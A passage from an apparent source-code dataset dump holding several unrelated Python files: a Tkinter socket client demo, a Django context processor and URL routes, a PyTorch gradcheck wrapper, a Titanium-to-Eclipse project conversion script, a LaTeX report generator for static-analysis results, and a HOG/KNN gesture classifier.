self.start_button.config(state="normal")
self.IP_entry_value.config(state="normal")
self.Port_entry_value.config(state="normal")
def validateIP(self, new_text, full_text):
if not full_text:
return True
if not new_text:
return True
if (new_text.isdigit() or new_text == ".") and len(full_text) < 16 and full_text.count(".") < 4:
return True
return False
def validatePort(self, new_text, full_text):
if not full_text:
return True
if not new_text:
return True
if new_text.isdigit() and len(full_text) < 6:
return True
return False
def manage_start_button(self, cmd_start, cmd_stop):
if 1 == self.start_button_val.get():
cmd_start()
else:
self.start_button.config(text="Connect to\nServer")
self.IP_entry_value.config(state="normal")
self.Port_entry_value.config(state="normal")
cmd_stop()
class ThreadedClient:
def __init__(self, master):
self.master = master
self.isClientRunning = False
self.clientSocket = None
self.clientFrame = Tk.Frame(master, width=50, height=100, bd=1, relief="sunken")
self.clientFrame.grid(padx=5, pady=5, sticky="ew")
self.guiClient = ClientGui(self.clientFrame, self.clientStartCmd, self.clientStopCmd)
def clientStartCmd(self):
if (False == self.isClientRunning):
if self.guiClient.serverIP.get() != "" and self.guiClient.serverPort.get() != "":
pass
self.clientThread = threading.Thread(target=self.client_thread, args = [])
self.clientThread.setDaemon(1)
self.clientThread.start()
else:
print("client already running")
def clientStopCmd(self):
self.isClientRunning = False
def client_thread(self):
host = self.guiClient.serverIP.get()
port = int(self.guiClient.serverPort.get())
self.guiClient.start_button.config(text="Connecting...\nClick to cancel")
try:
self.clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.clientSocket.connect((host, port))
self.clientSocket.settimeout(1)
except socket.error as msg:
print("Error connecting to server: " + str(msg))
else:
self.isClientRunning = True
while True == self.isClientRunning:
try:
data = self.clientSocket.recv(1024)
except socket.timeout:
continue
except socket.error as msg:
print('disconnected', msg)
break
else:
if len(data):
#print("-- before parsing --")
#print(data.decode())
dict_str = data.decode()
dict_list = [e+"}" for e in dict_str.split("}") if e]
for dict in dict_list:
parsed_data = self.parse_recv_data(dict)
if parsed_data is not None:
#print("-- received --")
print(parsed_data)
if "data" in parsed_data:
self.guiClient.greet_func()
elif "Button1" in parsed_data:
if (parsed_data["Button1"] > 0):
self.guiClient.sliderBt1Val.set(1)
else:
self.guiClient.sliderBt1Val.set(0)
elif "Button2" in parsed_data:
if (parsed_data["Button2"] > 0):
self.guiClient.sliderBt2Val.set(1)
else:
self.guiClient.sliderBt2Val.set(0)
elif "Slider" in parsed_data:
self.guiClient.sliderVal.set(parsed_data["Slider"])
else:
print('disconnected')
break
self.isClientRunning = False
self.clientSocket.close()
print('connection lost')
self.guiClient.bye_func()
def parse_recv_data(self, rx_data):
try:
convData = json.loads(rx_data)
except:
print("parsing error :invalid json data")
return None
else:
return convData
if __name__ == '__main__':
root = Tk.Tk()
root.title("PIC32MZ-W1 Curiosity Touch Demo")
ThreadedClient(root)
root.mainloop() |
23,409 | 97cb2f642e166f2a14e54350e3248a47cae0f0e1 | """
점프 투 파이썬 06장 게시판 페이징 하기
만든이 : 김동현
만든 날짜 : 2020년 07월 13일 월요일
"""
def getTotalPage(n, m):
if n % m == 0:
return int(n/m)
return int(n/m + 1)
print(getTotalPage(5, 10))
print(getTotalPage(15, 10))
print(getTotalPage(25, 10))
print(getTotalPage(30, 10))
|
23,410 | c31e10e37000f50d035d35c4d57f1448ce97aedf | from .models import Testimonial
# ? Función que genera testimonios dinámicos
def get_testimonials(request):
# Añadimos el filter para visulaizar los visbles
testimonials = Testimonial.objects.all().order_by('?')[:3]
return{
'testimonials': testimonials
}
|
23,411 | d8d7fc27b97ba6558b0ab9d19ef4d65c32b0ac35 | # Copyright (c) Chris Choy (chrischoy@ai.stanford.edu).
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Please cite "4D Spatio-Temporal ConvNets: Minkowski Convolutional Neural
# Networks", CVPR'19 (https://arxiv.org/abs/1904.08755) if you use any part
# of the code.
import torch
assert torch.__version__ >= "1.7.0", "Gradcheck requires pytorch 1.7 or higher"
from torch.types import _TensorOrTensors
from typing import Callable, Union, Optional
from torch.autograd.gradcheck import gradcheck as _gradcheck
def gradcheck(
func: Callable[..., Union[_TensorOrTensors]], # See Note [VarArg of Tensors]
inputs: _TensorOrTensors,
eps: float = 1e-6,
atol: float = 1e-5,
rtol: float = 1e-3,
raise_exception: bool = True,
check_sparse_nnz: bool = False,
nondet_tol: float = 0.0,
check_undefined_grad: bool = True,
check_grad_dtypes: bool = False,
) -> bool:
return _gradcheck(
lambda *x: func.apply(*x),
inputs,
eps=eps,
atol=atol,
rtol=rtol,
raise_exception=raise_exception,
check_sparse_nnz=check_sparse_nnz,
nondet_tol=nondet_tol,
check_undefined_grad=check_undefined_grad,
check_grad_dtypes=check_grad_dtypes,
)
|
23,412 | b42ce46dacf792a0ea681ef0fe8e6ec67c8537e1 | #!/usr/bin/env python
"""
* tidevtools 'ti_eclipsify' - Prepare a Titanium mobile 1.8.0+ project folder
* for importing into Eclipse.
*
* Copyright (c) 2010-2012 by Bill Dawson
* Licensed under the terms of the Apache Public License
* Please see the LICENSE included with this distribution for details.
* http://github.com/billdawson/tidevtools
*
* Just run this script at the top of a project folder.
* See ti_eclipsify.md for more details.
"""
import sys, os, shutil
# Contents for Eclipse/ADT required project files.
project_properties="""target=android-17
apk-configurations=
android.library.reference.1=../android/titanium
android.library.reference.2=../android/modules/accelerometer
android.library.reference.3=../android/modules/analytics
android.library.reference.4=../android/modules/android
android.library.reference.5=../android/modules/app
android.library.reference.6=../android/runtime/common
android.library.reference.7=../android/runtime/v8
android.library.reference.8=../android/modules/calendar
android.library.reference.9=../android/modules/contacts
android.library.reference.10=../android/modules/database
android.library.reference.11=../android/modules/geolocation
android.library.reference.12=../android/modules/filesystem
android.library.reference.13=../android/modules/gesture
android.library.reference.14=../android/modules/locale
android.library.reference.15=../android/modules/map
android.library.reference.16=../android/modules/media
android.library.reference.17=../android/modules/network
android.library.reference.18=../android/modules/platform
android.library.reference.19=../android/modules/ui
android.library.reference.20=../android/modules/utils
android.library.reference.21=../android/modules/xml
"""
dot_classpath_part1="""<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="src" path="gen"/>
<classpathentry kind="con" path="com.android.ide.eclipse.adt.ANDROID_FRAMEWORK"/>
<classpathentry exported="true" kind="con" path="com.android.ide.eclipse.adt.LIBRARIES"/>
<classpathentry kind="lib" path="/titanium/lib/commons-logging-1.1.1.jar"/>
<classpathentry kind="lib" path="/titanium/lib/ti-commons-codec-1.3.jar"/>
<classpathentry kind="lib" path="/titanium-dist/lib/kroll-apt.jar"/>
<classpathentry kind="lib" path="/titanium-xml/lib/jaxen-1.1.1.jar"/>
<classpathentry kind="lib" path="/titanium/lib/android-support-v4.jar"/>
<classpathentry kind="lib" path="/titanium/lib/thirdparty.jar"/>
"""
dot_classpath_part2="""
<classpathentry kind="output" path="bin/classes"/>
</classpath>
"""
dot_project="""<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>[PROJECT_NAME]</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>com.android.ide.eclipse.adt.ResourceManagerBuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>com.android.ide.eclipse.adt.PreCompilerBuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>com.android.ide.eclipse.adt.ApkBuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>com.android.ide.eclipse.adt.AndroidNature</nature>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
"""
this_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(this_path)
try:
import ticommon
except:
print >> sys.stderr, "[ERROR] Couldn't load ticommon from %s. It should be sitting side-by-side with this script. Message: &%s." % (this_path, err)
sys.exit(1)
############## DEFAULTS ########################
# Put a file named tidevtools_settings.py in the
# same folder as this file, then you can override this
TIMOBILE_SRC = ''
#################################################
if os.path.exists(os.path.join(this_path, 'tidevtools_settings.py')):
execfile(os.path.join(this_path, 'tidevtools_settings.py'))
if not os.path.exists(TIMOBILE_SRC):
print >> sys.stderr, "[ERROR] Could not locate the Titanium Mobile SDK sources. Please create a 'tidevtools_settings.py' in the same folder as this script file and add a string variable named TIMOBILE_SRC which is set to the path where the Titanium Mobile SDK sources are located."
sys.exit(1)
sys.path.append(os.path.join(TIMOBILE_SRC, "support", "android"))
from tilogger import *
log = TiLogger(None, level=TiLogger.INFO)
if not os.path.exists('tiapp.xml'):
log.error("I don't see any tiapp.xml file here. \nLooks like \n%s \nis not a Titanium project folder. Exiting..." % os.getcwd())
sys.exit(1)
resources_folder = os.path.join('.', 'Resources')
if not os.path.exists(resources_folder):
log.error("Couldn't find a Resources folder here.")
sys.exit(1)
resources_android_folder = os.path.join(resources_folder, 'android')
android_folder = os.path.join('.', 'build', 'android')
assets_folder = os.path.join(android_folder, 'assets')
bin_assets_folder = os.path.join(android_folder, "bin", "assets")
libs_folder = os.path.join(android_folder, "libs")
required_folders = (android_folder,
os.path.join(assets_folder),
os.path.join(android_folder, "res"),
os.path.join(android_folder, "gen"))
for required in required_folders:
if not os.path.exists(required):
log.error("You need to build your project one time with Titanium Studio before 'eclipsifying' it.")
sys.exit(1)
# For V8, copy required native libraries to libs/
if not os.path.exists(libs_folder):
os.makedirs(libs_folder)
""" Apparently not required anymore
src_libs_dir = os.path.join(TIMOBILE_SRC, "dist", "android", "libs")
if os.path.exists(src_libs_dir):
for root, dirs, files in os.walk(src_libs_dir):
for filename in files:
full_path = os.path.join(root, filename)
rel_path = os.path.relpath(full_path, src_libs_dir)
dest_file = os.path.join(os.path.abspath(libs_folder), rel_path)
if not os.path.exists(dest_file):
if not os.path.exists(os.path.dirname(dest_file)):
os.makedirs(os.path.dirname(dest_file))
shutil.copyfile(full_path, dest_file)
"""
app_info = ticommon.get_app_info('.')
appid = app_info["id"]
project_name = app_info["name"]
gen_folder = os.path.join(android_folder, 'gen', ticommon.appid_to_path(appid))
if not os.path.exists(gen_folder):
os.makedirs(gen_folder)
src_folder = os.path.abspath(os.path.join(android_folder, 'src', ticommon.appid_to_path(appid)))
r_file = os.path.join(src_folder, 'R.java')
if os.path.exists(r_file):
shutil.copyfile(r_file, os.path.join(gen_folder, 'R.java'))
os.remove(r_file)
# put everything that's in gen/, except R.java, into src/. Eclipse (or the ADT plugin, whatever)
# likes to cleanout the gen/ folder when building, which is really annoying when suddenly all of
# our generated classes disappear.
gen_files = [x for x in os.listdir(gen_folder) if x != 'R.java' and x.endswith('.java')]
if gen_files:
if not os.path.exists(src_folder):
os.makedirs(src_folder)
for one_gen_file in gen_files:
shutil.copyfile(os.path.join(gen_folder, one_gen_file), os.path.join(src_folder, one_gen_file))
os.remove(os.path.join(gen_folder, one_gen_file))
# Get rid of calls to TiVerify in the Application.java
application_java = [f for f in gen_files if f.endswith("Application.java")]
if application_java:
application_java = os.path.abspath(os.path.join(src_folder, application_java[0]))
lines = open(application_java, 'r').readlines()
lines = [l for l in lines if "TiVerify" not in l and "verify.verify" not in l]
open(application_java, "w").write("".join(lines))
# To avoid the Android 2373 warning, set special property in AppInfo.java
appinfo_java = [f for f in gen_files if f.endswith("AppInfo.java")]
if appinfo_java:
appinfo_java = os.path.abspath(os.path.join(src_folder, appinfo_java[0]))
lines = open(appinfo_java, 'r').readlines()
lines_out = []
for l in lines:
if l.endswith("app.getAppProperties();\n"):
lines_out.append(l)
lines_out.append('\t\t\t\t\tproperties.setBool("ti.android.bug2373.disableDetection", true);\n')
lines_out.append('\t\t\t\t\tappProperties.setBool("ti.android.bug2373.disableDetection", true);\n')
else:
lines_out.append(l)
with open(appinfo_java, 'w') as f:
f.write("".join(lines_out))
# Remove all code for starting up the Javascript debugger.
if application_java:
lines = open(application_java, 'r').readlines()
lines = [l for l in lines if "debug" not in l.lower()]
open(application_java, "w").write("".join(lines))
# if bin/assets/app.json is there, copy it to assets/app.json
if os.path.exists(os.path.join(bin_assets_folder, "app.json")):
shutil.copyfile(os.path.join(bin_assets_folder, "app.json"), os.path.join(assets_folder, "app.json"))
# if bin/assets/index.json is there, copy it to assets/index.json
if os.path.exists(os.path.join(bin_assets_folder, "index.json")):
shutil.copyfile(os.path.join(bin_assets_folder, "index.json"), os.path.join(assets_folder, "index.json"))
if ticommon.is_windows():
log.info("Copying Resources and tiapp.xml to assets folder because you're running Windows and therefore we're not going to make symlinks")
shutil.copytree(resources_folder, os.path.join(assets_folder, 'Resources'))
shutil.copy(os.path.join('.', 'tiapp.xml'), assets_folder)
else:
resources_dest = os.path.abspath(os.path.join(assets_folder, 'Resources'))
tiapp_dest = os.path.abspath(os.path.join(assets_folder, 'tiapp.xml'))
if not os.path.exists(resources_dest):
os.symlink(os.path.abspath(resources_folder), resources_dest)
if not os.path.exists(tiapp_dest):
os.symlink(os.path.abspath(os.path.join('.', 'tiapp.xml')), tiapp_dest)
if os.path.exists(resources_android_folder):
res_android_files = os.listdir(resources_android_folder)
if res_android_files:
for one_res_android_file in res_android_files:
one_res_android_file_dest = os.path.join(resources_dest, one_res_android_file)
log.info(one_res_android_file_dest)
if not os.path.exists(one_res_android_file_dest):
one_res_android_file_src = os.path.abspath(os.path.join(resources_android_folder, one_res_android_file))
#log.info("sym: " + one_res_android_file_dest + ' -> ' + one_res_android_file_src)
os.symlink(one_res_android_file_src, one_res_android_file_dest)
# put debuggable=true in Android manifest so you can do device debugging.
import codecs, re
f = codecs.open(os.path.join(android_folder, 'AndroidManifest.xml'), 'r', 'utf-8')
xml = f.read()
f.close()
xml = re.sub(r'android\:debuggable="false"', 'android:debuggable="true"', xml)
f = codecs.open(os.path.join(android_folder, 'AndroidManifest.xml'), 'w', 'utf-8')
f.write(xml)
# Get the modules used in the application
import xml.etree.ElementTree as ET
tree = ET.parse(os.path.join('.', 'tiapp.xml'))
root = tree.getroot()
modules = root.findall(".//modules/module[@platform='android']")
dot_classpath_entries = []
for module in modules:
module_name = module.text
module_version = module.get('version')
module_path = os.path.join('.', 'modules', 'android', module_name, module_version)
module_jar_name = module_name.rsplit('.', 1)[1] + '.jar'
module_jar_path = os.path.abspath(os.path.join(module_path, module_jar_name))
#log.info(module_name + ': ' + module_version + ' | ' + module_jar_name)
#log.info(module_jar_path)
dot_classpath_entries.append(' <classpathentry exported="true" kind="lib" path="' + module_jar_path + '"/>')
module_lib_path = os.path.join(module_path, 'lib')
if os.path.exists(module_lib_path):
module_lib_jars = os.listdir(module_lib_path)
for module_lib_jar in module_lib_jars:
module_lib_jar_path = os.path.abspath(os.path.join(module_lib_path, module_lib_jar))
dot_classpath_entries.append(' <classpathentry exported="true" kind="lib" path="' + module_lib_jar_path + '"/>')
module_libs_dir = os.path.join(module_path, "libs")
if os.path.exists(module_libs_dir):
for root, dirs, files in os.walk(module_libs_dir):
for filename in files:
full_path = os.path.join(root, filename)
rel_path = os.path.relpath(full_path, module_libs_dir)
dest_file = os.path.join(os.path.abspath(libs_folder), rel_path)
if not os.path.exists(dest_file):
if not os.path.exists(os.path.dirname(dest_file)):
os.makedirs(os.path.dirname(dest_file))
shutil.copyfile(full_path, dest_file)
# Write the required Eclipse/ADT .project, .classpath and project.properties files.
f = codecs.open(os.path.join(android_folder, ".classpath"), "w")
dot_classpath = ''.join([dot_classpath_part1, '\n'.join(dot_classpath_entries), dot_classpath_part2])
f.write(dot_classpath)
f.close()
f = codecs.open(os.path.join(android_folder, ".project"), "w")
f.write(dot_project.replace("[PROJECT_NAME]", project_name))
f.close()
f = codecs.open(os.path.join(android_folder, "project.properties"), "w")
f.write(project_properties)
f.close()
# Fixup Android library project paths in project.properties
props_file = os.path.join(android_folder, "project.properties")
f = codecs.open(props_file, 'r', 'utf-8')
lines = f.readlines()
newlines = []
f.close()
for line in lines:
if not line.startswith('android.library.reference'):
newlines.append(line)
continue
# Special case: the titanium module is only one folder
# down from "android" (other modules are two folders down)
titanium_module = "android%stitanium" % os.sep
if line.strip().endswith(titanium_module):
rel_path = titanium_module
else:
rel_path = os.sep.join(line.strip().split(os.sep)[-3:])
if not rel_path.startswith("android"):
newlines.append(line)
continue
full_path = os.path.join(TIMOBILE_SRC, rel_path)
if not os.path.exists(full_path):
newlines.append(line)
continue
newlines.append("%s=%s\n" % (line.split("=")[0], os.path.relpath(full_path, android_folder)))
f = codecs.open(props_file, 'w', 'utf-8')
f.write("".join(newlines))
f.close()
|
23,413 | dadc72614db315e1f1573262990b06851f305a61 | from django.urls import path
from . import views
from personal.views import (
home_screen_view,
)
from account.views import (ActivateAccount, ResendActivationEmail, VerifyNewEmail, ChangeEmail, )
app_name = 'sni_app'
urlpatterns = [
path('', views.home, name='sni_home'),
path('schedule', views.schedule, name='schedule'),
# path('synergyhub', views.synergy_hub, name='synergy-hub'),
path('about', views.about, name='about'),
path('organizer', views.organizer, name='organizer'),
path('speakers', views.speakers, name='speakers'),
path('sponsors', views.sponsors, name='sponsors'),
path('venue', views.venue, name='venue'),
path('resend_activation_email/<uidb64>/<token>/<target>', ResendActivationEmail.as_view(), name='resend'),
path('activate/<uidb64>/<token>', ActivateAccount.as_view(), name='activate'),
path('verify_new_email/<uidb64>/<token>/<to>', VerifyNewEmail.as_view(), name='verify_new_email'),
path('email_change', ChangeEmail.as_view(), name='email_change'),
#
# path('deactivate_account', DeactivateAccount.as_view(), name='deactivate_account'),
# path('deactivate_account/verify/<uidb64>/<token>', VerifyDeactivateAccount.as_view(), name='verify_deactivate_account'),
]
|
23,414 | 25571139c06dea0d14689e55edee7808955faf8c | #!/bin/env python
################################################################################
#
# file : LatexGenerator.py
#
# author: Lakshmi Manohar Rao Velicheti - lveliche@iupui.edu
#
################################################################################
from ..ReportGenerator import ReportGenerator
from ..DataAbstractions import *
from ..Tool import Tool
from .. import Utilities
from lxml import etree
import urllib.request
import zipfile
import io
import logging
import statistics
import sys
from collections import defaultdict
class Organizer:
class Grainularity (Enum) :
FILENAME = 0
FUNCTION = 1
LINE = 2
def __init__ (self, grainularity, truth, build):
self.grainularity = grainularity
self.truth_rs = truth
self.build_rs = build
# shamelessly stolen from:
# http://stackoverflow.com/questions/16724788/how-can-i-get-python-to-automatically-create-missing-key-value-pairs-in-a-dictio
# Recursive dictionary factory, automatically creates directory keys if they do
# not exist. Default values are dicts. i.e. nested_dict[1][2][3] will automatically
# create a structure like {1: {2: {3: {}}}
nested_dict = lambda: defaultdict(nested_dict)
self.data = nested_dict ()
def organize (self):
self._group (self.truth_rs)
self._group (self.build_rs)
def _group (self, result_set):
for weakness in result_set.weaknesses ():
for suite in weakness.suites:
# Handle the flaws
for flaw in suite.flaws:
# Find the target, this will create the necessary keys if required
target = self._get_target (weakness, suite, flaw)
if not target:
# First time seeing this file/fuction/line, need to set its value
newdict = self._get_default_data (weakness, suite, flaw)
target.update (newdict)
else:
target['flaws'].append (flaw)
# Handle the bugs
for bug in suite.bugs:
# Find the target, this will create the necessary keys if required
target = self._get_target (weakness, suite, bug)
if not target:
# First time seeing this file/fuction/line, need to set its value
newdict = self._get_default_data (weakness, suite, bug)
target.update (newdict)
else:
target['bugs'].append (bug)
#
# Get the appropriate target based on the grainularity
#
def _get_target (self, weakness, suite, obj):
if self.grainularity == Organizer.Grainularity.FILENAME:
return self.data[weakness.name][suite.directory][obj.filename]
elif self.grainularity == Organizer.Grainularity.FUNCTION:
return self.data[weakness.name][suite.directory][obj.filename][obj.function]
else:
return self.data[weakness.name][suite.directory][obj.filename][obj.function][obj.line]
#
# Make the default data dictionary based on the object provided
#
def _get_default_data (self, weakness, suite, obj):
# We always have flaws, bugs, weakness, directory, and filename
result = {'flaws': [], 'bugs': [], 'weakness': weakness.name, 'directory': suite.directory,
'filename': obj.filename, 'function': '', 'line': ''}
# Populate the function/line if we used that grainularity
if self.grainularity == Organizer.Grainularity.FUNCTION:
result['function'] = obj.function
elif self.grainularity == Organizer.Grainularity.LINE:
result['function'] = obj.function
result['line'] = obj.line
# Append the provided object to the correct list
if isinstance (obj, Bug):
result['bugs'].append (obj)
else:
result['flaws'].append (obj)
return result
#
# Find the leaves in the provided organized dictionary
#
def find_leaves (self, dictionary):
if isinstance (dictionary.get ('flaws'), list):
return [dictionary]
result = []
for key in dictionary.keys ():
result.extend (self.find_leaves (dictionary.get (key)))
return result
class DataPoint:
def __init__ (self):
self.tp = 0
self.fp = 0
self.fn = 0
self.weakness = None
self.directory = None
self.flaws = []
self.bugs = []
self.tool = None
self.truth = None
def precision (self):
try:
return self.tp / (self.tp + self.fp * 1.0)
except Exception as e:
return 0
def recall (self):
try:
return self.tp / (self.tp + self.fn * 1.0)
except Exception as e:
return 0
#
# Factory for Report Generation
# @returns LatexGenerator object
#
def __create__():
return LatexGenerator()
#
# Concrete class - PDFLatexGenerator
#
class LatexGenerator(ReportGenerator):
#
# Initialize the parser
#
@staticmethod
def init_parser (parser):
latex_parser = parser.add_parser ('latex', help='Convert evidence into a latex file')
latex_parser.set_defaults (generator=LatexGenerator)
#
# Initalize the generator
#
def parse_args (self, args):
# Call the base class (Command) init
super (LatexGenerator, self).parse_args (args)
self.pages = []
self.appendix = None
self.load_pages ()
#
# Load the pages
#
def load_pages (self):
# Some pages are repeated per grainularity (i.e. Summary). These should
# be in the correct order.
page_order = ['Methodology', 'Summary', 'Detail']
script_path = os.path.dirname (os.path.abspath (sys.argv[0]))
for cls in Utilities.import_classes (script_path, 'lib/ReportGenerators/LatexPages', 'name'):
if cls.name () == 'Appendix':
self.appendix = cls ()
elif cls.name () in page_order:
self.pages.insert (page_order.index (cls.name ()), cls ())
else:
logging.warning ("WARNING: Found unexpected Latex Page [%s], skipping..." % cls.name ())
logging.debug ('Loaded LatexPages [%s]' % self.pages)
#
# Generate Report of respective type
#
def generate (self, truth, build):
# Construct the appropriate Tool object which was used for the build
self.tool = self.get_tool (build)()
# The same appendix is used for each permutation, so we initalize
# and finialize it here instead of in write_report
self.appendix.parse_args (build.GetSource ())
logging.info ('Generating report based on filename')
self.write_report (truth, build, Organizer.Grainularity.FILENAME)
logging.info ('Generating report based on function')
self.write_report (truth, build, Organizer.Grainularity.FUNCTION)
logging.info ('Generating report based on line')
self.write_report (truth, build, Organizer.Grainularity.LINE)
self.appendix.fini ()
def write_report (self, truth, build, grainularity):
# Organize the truth and build result sets
organizer = Organizer (grainularity,
truth,
build)
organizer.organize ()
# We create two permutations for each grainularity:
# One where Bugs with wrong checkers count as false postives ([tool].[grainularity].tex)
# One where Bugs with wrong checkers don't count as false positives ([tool].[grainularity].skip.tex)
permutations = [('%s.%s.tex' % (build.GetSource (), str (grainularity).split ('.')[-1]), True),
('%s.%s.skip.tex' % (build.GetSource (), str (grainularity).split ('.')[-1]), False)]
for (filename, wrong_checker_fp) in permutations:
# Initalize the pages
for page in self.pages:
page.parse_args (organizer, wrong_checker_fp)
# Get the leaves
for data in organizer.find_leaves (organizer.data):
# Build datapoint
datapoint = self.build_datapoint (organizer, data, wrong_checker_fp)
# If there are 0 expected flaws, don't report on this datapoint.
# This can happen when there are only incidental flaws for
# the grainularity (i.e. line-based reporting where a line
# only has an incidental flaw)
if (0 == datapoint.tp + datapoint.fn):
logging.debug ('Skipping datapoint with 0 expected flaws')
continue
self.appendix.visit (datapoint)
for page in self.pages:
page.visit (datapoint)
# Write the main report page
outfile = open (filename, 'w')
self.init_latex (outfile, build.GetSource (), truth.GetSource ())
# Finialize the pages
for page in self.pages:
self.include_page (outfile, page)
page.fini ()
self.include_page (outfile, self.appendix)
self.fini_latex (outfile)
#
# Build a datapoint from the provided data structure
#
def build_datapoint (self, organizer, data, wrong_checker_is_fp):
# Get the probability matrix
(tp, fp, fn) = self.compute_probability (data, wrong_checker_is_fp)
# Build a data point
result = DataPoint ()
result.tp = tp
result.fp = fp
result.fn = fn
result.weakness = data['weakness']
result.directory = data['directory']
result.flaws = data['flaws']
result.bugs = data['bugs']
result.tool = organizer.build_rs.GetName ()
result.truth = organizer.truth_rs.GetName ()
return result
#
# Compute the probability matrix from the provided data
#
def compute_probability (self, data, wrong_checker_is_fp):
# Build a list of incidental CWEs which appear in the data
incidentals = [f for f in data['flaws'] if f.severity == FlawType.INCIDENTAL]
incidental_cwes = set ()
for flaw in incidentals:
cwe = flaw.description.replace (' ', '')
if cwe.startswith ('CWE'):
incidental_cwes.add (cwe[:6])
right_checker = 0
wrong_checker = 0
# Check the bugs to see if they have the right or wrong checker
for bug in data['bugs']:
if self.tool.correct_checker (bug, data['weakness']):
right_checker += 1
else:
# Check for true positives on incidental flaws
found_incidental = False
for cwe in incidental_cwes:
if self.tool.correct_checker (bug, cwe):
found_incidental = True
if not found_incidental:
wrong_checker += 1
# Compute the TP/FP/FN probability matrix
tp = 0
fp = 0
fn = 0
expected = 0
if wrong_checker_is_fp:
fp += wrong_checker
# Correct checkers in good functions are false positives
if 'good' in data['function']:
fp += right_checker
else:
tp += right_checker
expected = len ([f for f in data['flaws'] if f.severity != FlawType.FIX
and f.severity != FlawType.INCIDENTAL])
if tp > expected:
fp += tp - expected
tp = expected
else:
# The tool didn't find some of the expected flaws
fn = expected - tp
return (tp, fp, fn)
#
# Write the generic portion of the latex report
#
def init_latex (self, fp, tool_name, truth_name):
fp.write ('\\documentclass[12pt]{report}\n\\usepackage{graphicx}\n\\usepackage{xcolor}\n\\usepackage[framemethod=tikz]{mdframed}\n\\usepackage{hyperref}')
fp.write ('\n\\usepackage{longtable}\n\\usepackage{multirow}\n\\usepackage[toc,page]{appendix}')
fp.write ('\n\\title{SCATE Report for %s Against %s}' % (tool_name, truth_name))#(self.__title__))
fp.write('\n\\begin{document}\n\maketitle')
fp.write('\n\\renewcommand\\thesection{\Roman{section}} \n')
fp.write('\n\\setcounter{tocdepth}{1}\n\\tableofcontents\n\\newpage\n')
#
# Include page in the report
#
def include_page (self, fp, page):
fp.write ('\\input{%s}\n' % page.tex_name ())
#
# Finish the latex report
#
def fini_latex (self, fp):
fp.write('\n\\end{document}')
#
# Get the correct tool object from the provided result set
#
def get_tool (self, rs):
for tool in Utilities.get_tools ():
if rs.GetSource () == tool.name ():
logging.debug ('Using tool [%s]' % tool)
return tool
logging.error ('ERROR: Unable to find tool for source [%s]' % rs.GetSource ())
sys.exit (1)
|
23,415 | 1507207d0acc995cf219664c2e2e7fe16bd9f492 | import os
# import matplotlib as mpl
# import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from joblib import dump, load
from PIL import Image
from skimage.feature import hog
from skimage.color import rgb2grey
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from keras.utils import to_categorical
def fd_hu_moments(image):
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
feature = cv2.HuMoments(cv2.moments(image)).flatten()
return feature
images_done = 0
lookup = dict()
reverselookup = dict()
count = 0
for j in os.listdir('../leapGestRecog/00/'):
if not j.startswith('.'): # If running this code locally, this is to
# ensure you aren't reading in hidden folders
lookup[j] = count
reverselookup[count] = j
count = count + 1
lookup
'''
x_data = []
y_data = []
datacount = 0 # We'll use this to tally how many images are in our dataset
for i in range(0, 10): # Loop over the ten top-level folders
for j in os.listdir('../leapGestRecog/0' + str(i) + '/'):
if not j.startswith('.'): # Again avoid hidden folders
count = 0 # To tally images of a given gesture
for k in os.listdir('../leapGestRecog/0' +
str(i) + '/' + j + '/'):
# Loop over the images
img = Image.open('../leapGestRecog/0' +
str(i) + '/' + j + '/' + k).convert('L')
# Read in and convert to greyscale
img = img.resize((320, 120))
arr = np.array(img)
grey_img = rgb2grey(arr)
hog_features = hog(grey_img, block_norm='L2-Hys', pixels_per_cell=(16, 16))
x_data.append(hog_features)
count = count + 1
images_done = images_done + 1
print('../leapGestRecog/0' + str(i) + '/' + str(j) + '/' + str(k) + ' DONE!', str(images_done)+'/20000')
y_values = np.full((count, 1), lookup[j])
y_data.append(y_values)
datacount = datacount + count
x_data = np.array(x_data, dtype = 'float32')
ss = StandardScaler()
x_data = ss.fit_transform(x_data)
pca = PCA(n_components=500)
x_data = pca.fit_transform(x_data)
y_data = np.array(y_data)
y_data = y_data.reshape(datacount, 1) # Reshape to be the correct size
np.save('samples', x_data)
np.save('labels', y_data)'''
x_data = np.load('samples.npy')
y_data = np.load('labels.npy')
# y_data = to_categorical(y_data)
# y_data = y_data.reshape(20000, 10)
# x_data = x_data.reshape((20000, 120, 320, 1))
# x_data /= 255
x_train,x_test,y_train,y_test = train_test_split(x_data, y_data, test_size=0.2)
#x_validate,x_test,y_validate,y_test = train_test_split(x_further, y_further, test_size=0.5)
# clf = load('Model.joblib')
clf = KNeighborsClassifier(n_neighbors=5)
clf.fit(x_train, y_train)
